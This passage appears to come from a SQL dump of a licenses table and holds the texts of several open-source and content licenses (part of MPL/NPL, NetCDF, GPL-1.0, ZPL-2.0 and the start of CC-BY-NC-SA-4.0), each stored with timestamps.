to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\nc. the licenses granted in this Section 2.1 (a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\nd. Notwithstanding Section 2.1 (b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n2.2. Contributor Grant. Subject to third party intellectual property claims,\neach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense\n\na. under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\nb. under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\nc. the licenses granted in Sections 2.2 (a) and 2.2 (b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\nd. Notwithstanding Section 2.2 (b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims\n\nIf Contributor has knowledge that a license under a third party\'s intellectual\nproperty rights is required to exercise the rights granted by such Contributor\nunder Sections 2.1 or 2.2, Contributor must include a text file with the Source\nCode distribution titled \"LEGAL\" which describes the claim and the party making\nthe claim in sufficient detail that a recipient will know whom to contact.\nIf Contributor obtains such knowledge after the Modification is made available\nas described in Section 3.2, Contributor shall promptly modify the LEGAL file\nin all copies Contributor makes available thereafter and shall take other\nsteps (such as notifying appropriate mailing lists or newsgroups) reasonably\ncalculated to inform those who received the Covered Code that new knowledge\nhas been obtained.\n\n (b) Contributor APIs\n\nIf Contributor\'s Modifications include an application programming interface\nand Contributor has knowledge of patent licenses which are reasonably necessary\nto implement that API, Contributor must also include this information in the\nLEGAL file.\n\n (c) Representations.\n\nContributor represents that, except as disclosed pursuant to Section 3.4 (a)\nabove, Contributor believes that Contributor\'s Modifications are Contributor\'s\noriginal creation(s) and/or Contributor has sufficient rights to grant the\nrights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Covered Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Code. However,\nYou may do so only on Your own behalf, and not on behalf of the Initial Developer\nor any Contributor. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Sections 3.1, 3.2, 3.3, 3.4\nand 3.5 have been met for that Covered Code, and if You include a notice stating\nthat the Source Code version of the Covered Code is available under the terms\nof this License, including a description of how and where You have fulfilled\nthe obligations of Section 3.2. The notice must be conspicuously included\nin any notice in an Executable version, related documentation or collateral\nin which You describe recipients\' rights relating to the Covered Code. You\nmay distribute the Executable version of Covered Code or ownership rights\nunder a license of Your choice, which may contain terms different from this\nLicense, provided that You are in compliance with the terms of this License\nand that the license for the Executable version does not attempt to limit\nor alter the recipient\'s rights in the Source Code version from the rights\nset forth in this License. If You distribute the Executable version under\na different license You must make it absolutely clear that any terms which\ndiffer from this License are offered by You alone, not by the Initial Developer\nor any Contributor. You hereby agree to indemnify the Initial Developer and\nevery Contributor for any liability incurred by the Initial Developer or such\nContributor as a result of any such terms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions\n\nNetscape Communications Corporation (\"Netscape\") may publish revised and/or\nnew versions of the License from time to time. Each version will be given\na distinguishing version number.\n\n 6.2. Effect of New Versions\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Netscape. No one other than Netscape has the right\nto modify the terms applicable to Covered Code created under this License.\n\n 6.3. Derivative Works\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrases \"Mozilla\",\n\"MOZILLAPL\", \"MOZPL\", \"Netscape\", \"MPL\", \"NPL\" or any confusingly similar\nphrase do not appear in your license (except to note that your license differs\nfrom this License) and (b) otherwise make it clear that Your version of the\nlicense contains terms which differ from the Mozilla Public License and Netscape\nPublic License. (Filling in the name of the Initial Developer, Original Code\nor Contributor in the notice described in Exhibit A shall not of themselves\nbe deemed to be modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. Termination\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\na. such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\nb. any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. government end users\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. Miscellaneous\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. Responsibility for claims\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. Multiple-licensed code\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the MPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A. Exhibit A - Mozilla Public License.\n\n\" The contents of this file are subject to the Mozilla Public License Version\n1.1 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.mozilla.org/MPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is ______________________________________ .\n\nThe Initial Developer of the Original Code is ________________________ .\n\nPortions created by ______________________ are Copyright (C) ______ . All\nRights Reserved.\n\nContributor(s): ______________________________________ .\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the \" [___] License\"), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the MPL, indicate your\ndecision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe MPL or the [___] License. \"\n\nNOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(45,'NetCDF','Copyright 1993-2014 University Corporation for Atmospheric Research/Unidata\n\nPortions of this software were developed by the Unidata Program at the University\nCorporation for Atmospheric Research.\n\nAccess and use of this software shall impose the following obligations and\nunderstandings on the user. The user is granted the right, without any fee\nor cost, to use, copy, modify, alter, enhance and distribute this software,\nand any derivative works thereof, and its supporting documentation for any\npurpose whatsoever, provided that this entire notice appears in all copies\nof the software, derivative works and supporting documentation. Further, UCAR\nrequests that the user credit UCAR/Unidata in any publications that result\nfrom the use of this software or in any product that includes this software,\nalthough this is not an obligation. The names UCAR and/or Unidata, however,\nmay not be used in any advertising or publicity to endorse or promote any\nproducts or commercial entity unless specific written permission is obtained\nfrom UCAR/Unidata. The user also understands that UCAR/Unidata is not obligated\nto provide the user with any support, consulting, training or assistance of\nany kind with regard to the use, operation and performance of this software\nnor to provide the user with any updates, revisions, new versions or \"bug\nfixes.\"\n\nTHIS SOFTWARE IS PROVIDED BY UCAR/UNIDATA \"AS IS\" AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UCAR/UNIDATA\nBE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION\nOF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION\nWITH THE ACCESS, USE OR PERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(46,'GPL-1.0-only','GNU GENERAL PUBLIC LICENSE\n\nVersion 1, February 1989\n\nCopyright (C) 1989 Free Software Foundation, Inc. 51 Franklin St, Fifth Floor,\nBoston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe license agreements of most software companies try to keep users at the\nmercy of those companies. By contrast, our General Public License is intended\nto guarantee your freedom to share and change free software--to make sure\nthe software is free for all its users. The General Public License applies\nto the Free Software Foundation\'s software and to any other program whose\nauthors commit to using it. You can use it for your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Specifically,\nthe General Public License is designed to make sure that you have the freedom\nto give away or sell copies of free software, that you receive source code\nor can get it if you want it, that you can change the software or use pieces\nof it in new free programs; and that you know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe software, or if you modify it.\n\nFor example, if you distribute copies of a such a program, whether gratis\nor for a fee, you must give the recipients all the rights that you have. You\nmust make sure that they, too, receive or can get the source code. And you\nmust tell them their rights.\n\nWe protect your rights with two steps: (1) copyright the software, and (2)\noffer you this license which gives you legal permission to copy, distribute\nand/or modify the software.\n\nAlso, for each author\'s protection and ours, we want to make certain that\neveryone understands that there is no warranty for this free software. If\nthe software is modified by someone else and passed on, we want its recipients\nto know that what they have is not the original, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nGNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION\nAND MODIFICATION\n\n \n\n0. This License Agreement applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed under\nthe terms of this General Public License. The \"Program\", below, refers to\nany such program or work, and a \"work based on the Program\" means either the\nProgram or any work containing the Program or a portion of it, either verbatim\nor with modifications. Each licensee is addressed as \"you\".\n\n \n\n1. You may copy and distribute verbatim copies of the Program\'s source code\nas you receive it, in any medium, provided that you conspicuously and appropriately\npublish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this General Public License and\nto the absence of any warranty; and give any other recipients of the Program\na copy of this General Public License along with the Program. You may charge\na fee for the physical act of transferring a copy.\n\n \n\n2. You may modify your copy or copies of the Program or any portion of it,\nand copy and distribute such modifications under the terms of Paragraph 1\nabove, provided that you also do the following:\n\na) cause the modified files to carry prominent notices stating that you changed\nthe files and the date of any change; and\n\nb) cause the whole of any work that you distribute or publish, that in whole\nor in part contains the Program or any part thereof, either with or without\nmodifications, to be licensed at no charge to all third parties under the\nterms of this General Public License (except that you may choose to grant\nwarranty protection to some or all third parties, at your option).\n\nc) If the modified program normally reads commands interactively when run,\nyou must cause it, when started running for such interactive use in the simplest\nand most usual way, to print or display an announcement including an appropriate\ncopyright notice and a notice that there is no warranty (or else, saying that\nyou provide a warranty) and that users may redistribute the program under\nthese conditions, and telling the user how to view a copy of this General\nPublic License.\n\nd) You may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\nMere aggregation of another independent work with the Program (or its derivative)\non a volume of a storage or distribution medium does not bring the other work\nunder the scope of these terms.\n\n \n\n3. You may copy and distribute the Program (or a portion or derivative of\nit, under Paragraph 2) in object code or executable form under the terms of\nParagraphs 1 and 2 above provided that you also do one of the following:\n\na) accompany it with the complete corresponding machine-readable source code,\nwhich must be distributed under the terms of Paragraphs 1 and 2 above; or,\n\nb) accompany it with a written offer, valid for at least three years, to give\nany third party free (except for a nominal charge for the cost of distribution)\na complete machine-readable copy of the corresponding source code, to be distributed\nunder the terms of Paragraphs 1 and 2 above; or,\n\nc) accompany it with the information you received as to where the corresponding\nsource code may be obtained. (This alternative is allowed only for noncommercial\ndistribution and only if you received the program in object code or executable\nform alone.)\n\nSource code for a work means the preferred form of the work for making modifications\nto it. For an executable file, complete source code means all the source code\nfor all modules it contains; but, as a special exception, it need not include\nsource code for modules which are standard libraries that accompany the operating\nsystem on which the executable file runs, or for standard header files or\ndefinitions files that accompany that operating system.\n\n \n\n4. You may not copy, modify, sublicense, distribute or transfer the Program\nexcept as expressly provided under this General Public License. Any attempt\notherwise to copy, modify, sublicense, distribute or transfer the Program\nis void, and will automatically terminate your rights to use the Program under\nthis License. However, parties who have received copies, or rights to use\ncopies, from you under this General Public License will not have their licenses\nterminated so long as such parties remain in full compliance.\n\n \n\n5. By copying, distributing or modifying the Program (or any work based on\nthe Program) you indicate your acceptance of this license to do so, and all\nits terms and conditions.\n\n \n\n6. Each time you redistribute the Program (or any work based on the Program),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute or modify the Program subject to these terms and conditions.\nYou may not impose any further restrictions on the recipients\' exercise of\nthe rights granted herein.\n\n \n\n7. The Free Software Foundation may publish revised and/or new versions of\nthe General Public License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\na version number of the license which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nProgram does not specify a version number of the license, you may choose any\nversion ever published by the Free Software Foundation.\n\n \n\n8. If you wish to incorporate parts of the Program into other free programs\nwhose distribution conditions are different, write to the author to ask for\npermission. For software which is copyrighted by the Free Software Foundation,\nwrite to the Free Software Foundation; we sometimes make exceptions for this.\nOur decision will be guided by the two goals of preserving the free status\nof all derivatives of our free software and of promoting the sharing and reuse\nof software generally.\n\n \n\n NO WARRANTY\n\n9. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n \n\n10. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nAppendix: How to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to humanity, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively convey the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.> Copyright\n(C) 19yy <name of author>\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 1, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program; if not, write to the Free Software Foundation, Inc., 675 Mass\nAve, Cambridge, MA 02139, USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this when\nit starts in an interactive mode:\n\nGnomovision version 69, Copyright (C) 19xx name of author Gnomovision comes\nwith ABSOLUTELY NO WARRANTY; for details type `show w\'. This is free software,\nand you are welcome to redistribute it under certain conditions; type `show\nc\' for details.\n\nThe hypothetical commands `show w\' and `show c\' should show the appropriate\nparts of the General Public License. Of course, the commands you use may be\ncalled something other than `show w\' and `show c\'; they could even be mouse-clicks\nor menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. Here\na sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision\'\n(a program to direct compilers to make passes at assemblers) written by James\nHacker.\n\n<signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(47,'ZPL-2.0','Zope Public License (ZPL) Version 2.0\n\nThis software is Copyright (c) Zope Corporation (tm) and Contributors. All\nrights reserved. This license has been certified as open source. It has also\nbeen designated as GPL compatible by the Free Software Foundation (FSF).\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions in source code must retain the above copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions, and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name Zope Corporation (tm) must not be used to endorse or promote products\nderived from this software without prior written permission from Zope Corporation.\n\n4. The right to distribute this software or to use it for any purpose does\nnot give you the right to use Servicemarks (sm) or Trademarks (tm) of Zope\nCorporation. Use of them is covered in a separate agreement (see http://www.zope.com/Marks).\n\n5. If any files are modified, you must cause the modified files to carry prominent\nnotices stating that you changed the files and the date of any change.\n\nDisclaimer\n\nTHIS SOFTWARE IS PROVIDED BY ZOPE CORPORATION ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL ZOPE CORPORATION OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This software consists of contributions\nmade by Zope Corporation and many individuals on behalf of Zope Corporation.\nSpecific attributions are listed in the accompanying credits file.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(48,'CC-BY-NC-SA-4.0','Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Creative\nCommons Corporation (\"Creative Commons\") is not a law firm and does not provide\nlegal services or legal advice. Distribution of Creative Commons public licenses\ndoes not create a lawyer-client or other relationship. Creative Commons makes\nits licenses and related information available on an \"as-is\" basis. Creative\nCommons gives no warranties regarding its licenses, any material licensed\nunder their terms and conditions, or any related information. Creative Commons\ndisclaims all liability for damages resulting from their use to the fullest\nextent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\nConsiderations for the public: By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described. Although not required by our licenses, you are encouraged to\nrespect those requests where reasonable. More considerations for the public\n: wiki.creativecommons.org/Considerations_for_licensees\n\nCreative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public\nLicense\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution-NonCommercial-ShareAlike\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be 